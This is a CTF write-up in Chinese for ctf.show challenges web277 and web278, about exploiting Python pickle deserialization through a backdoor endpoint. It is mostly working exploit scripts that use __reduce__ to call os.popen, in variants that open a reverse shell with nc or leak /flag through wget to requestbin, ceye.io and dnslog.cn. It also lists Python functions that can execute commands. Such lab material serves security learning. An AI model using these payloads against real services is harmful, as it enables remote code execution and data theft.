web277
进入靶场会看到where is flag?
,Ctrl+U 检查源代码后可以看到注释的 html 标签
<!--/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m) -->
看到 pickle.loads
就知道是 python 反序列化没跑了。
先看给的提示:传入的 data 先进行 base64 解码后在进行反序列化,所以我们序列化完成之后还要额外进行 base64 编码
先简单的写一个爬虫脚本:
import os
import pickle
import base64
import requests
class exp(object):
def __reduce__(self):
payload = 'ls /'
return (os.popen,(payload,))
a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)
url="http://db665ec1-9a5b-4b46-a07e-045ad97ce824.challenge.ctf.show/backdoor"
params={'data':c}
r=requests.get(url=url,params=params)
print(r.text)
params
的作用是将请求中的参数添加到 URL 中,以便将这些参数传递给服务器。在这种情况下,params
是一个字典,包含了要作为查询字符串添加到 URL 中的参数。最终的 URL 将包含这些参数,以便服务器可以根据这些参数来处理请求。
无论是ls /
还是cat /flag
,回显都是 backdoor here:说明是一道 ”无回显“ 的题目。
有两种方法:反弹 shell 和 的 dns 外带
反弹 shell
只需将脚本稍微改一下:
import os
import pickle
import base64
import requests
class exp(object):
def __reduce__(self):
payload = 'nc vps-ip port -e /bin/sh'
return (os.popen,(payload,))
a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)
url="http://db665ec1-9a5b-4b46-a07e-045ad97ce824.challenge.ctf.show/backdoor"
params={'data':c}
r=requests.get(url=url,params=params)
print(r.text)
然后先再 vps 上开启对应端口的监听在运行脚本(否则会报错)
以1234端口为例:
nc -lvnp 1234
运行脚本后则会显示:
此时就可以输入 Linux 命令来读取 flag 啦
dns 外带
RequestBin
网址:RequestBin — Collect, inspect and debug HTTP requests and webhooks
先点击 Create a RequestBin 获取一个 url
同样只需将脚本稍微改一下:
import os
import pickle
import base64
import requests
class exp(object):
def __reduce__(self):
payload = 'wget http://requestbin.cn:80/1cpartx1?a=`cat /flag`'
return (os.popen,(payload,))
a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)
url="http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor"
params={'data':c}
r=requests.get(url=url,params=params)
print(r.text)
wget
是一个在命令行下使用的下载工具,它可以从指定的URL下载文件。
运行脚本就能得到 flag
CEYE
网址:CEYE - Monitor service for security testing
可以稍微参考一下这篇文章:RCE绕过之无回显-CSDN博客,也可以在 http://ceye.io/payloads 中找相对应的 payload
在 http://ceye.io/profile 下的 Identifier 可以获取对应 url
同样只需将脚本稍微改一下:
import os
import pickle
import base64
import requests
class exp(object):
def __reduce__(self):
payload = 'wget `cat /flag`.zrne70.ceye.io'
return (os.popen,(payload,))
a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)
url="http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor"
params={'data':c}
r=requests.get(url=url,params=params)
print(r.text)
在 http://ceye.io/records/dns 即可找到 flag
DNSlog
先点击 Get SubDomain 获取一个 url
同样只需将脚本稍微改一下:
import os
import pickle
import base64
import requests
class exp(object):
def __reduce__(self):
payload = 'wget `cat /flag`.n4jlw3.dnslog.cn'
return (os.popen,(payload,))
a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)
url="http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor"
params={'data':c}
r=requests.get(url=url,params=params)
print(r.text)
运行脚本后,回到 DNSlog 平台,点击 Refresh Record 就可看到被拼接的 flag
web278
提示:过滤了 os.system
使用上题脚本即可
python 可以执行命令的函数:
eval, execfile, compile, open, file, map, input,
os.system, os.popen, os.popen2, os.popen3, os.popen4, os.open, os.pipe,
os.listdir, os.access,
os.execl, os.execle, os.execlp, os.execlpe, os.execv,
os.execve, os.execvp, os.execvpe, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe,
pickle.load, pickle.loads,cPickle.load,cPickle.loads,
subprocess.call,subprocess.check_call,subprocess.check_output,subprocess.Popen,
commands.getstatusoutput,commands.getoutput,commands.getstatus,
glob.glob,
linecache.getline,
shutil.copyfileobj,shutil.copyfile,shutil.copy,shutil.copy2,shutil.move,shutil.make_archive,
dircache.listdir,dircache.opendir,
io.open,
popen2.popen2,popen2.popen3,popen2.popen4,
timeit.timeit,timeit.repeat,
sys.call_tracing,
code.interact,code.compile_command,codeop.compile_command,
pty.spawn,
posixfile.open,posixfile.fileopen,
platform.popen